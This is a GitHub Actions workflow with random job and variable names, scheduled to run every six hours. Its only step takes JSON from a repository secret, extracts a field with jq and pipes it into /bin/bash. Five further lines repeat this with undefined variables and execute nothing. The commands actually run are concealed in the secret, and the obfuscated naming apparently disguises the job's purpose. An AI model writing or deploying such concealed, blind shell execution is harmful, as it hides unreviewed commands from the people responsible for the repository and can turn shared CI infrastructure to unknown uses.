name: guoshantui4678
on:
  workflow_dispatch:
  schedule:
    - cron: '6 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: guoshantui4678
        env:
          dbhqp3621: ${{ secrets.dbhqp3621 }}
        run: |
          echo $dbhqp3621 | jq -r .sjttj1230 | /bin/bash
          echo $k7 | jq -r .ltxn5224 | /bin/bash
          echo $xsmbu3 | jq -r .axmp55676 | /bin/bash
          echo $vqen60508 | jq -r .klm9826 | /bin/bash
          echo $vjb883 | jq -r .sncrp771 | /bin/bash
          echo $hsktl4 | jq -r .wcfl39 | /bin/bash

